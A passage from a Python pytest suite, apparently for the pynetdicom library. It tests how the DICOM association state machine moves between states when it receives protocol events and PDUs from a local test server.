if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00')
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2)
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt15', 'Evt17']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: If service user initiated:
# Issue A-ABORT primitve and close transport
# Otherwise
# Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
# Sta1 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3)
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.01)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TD PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.abort()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
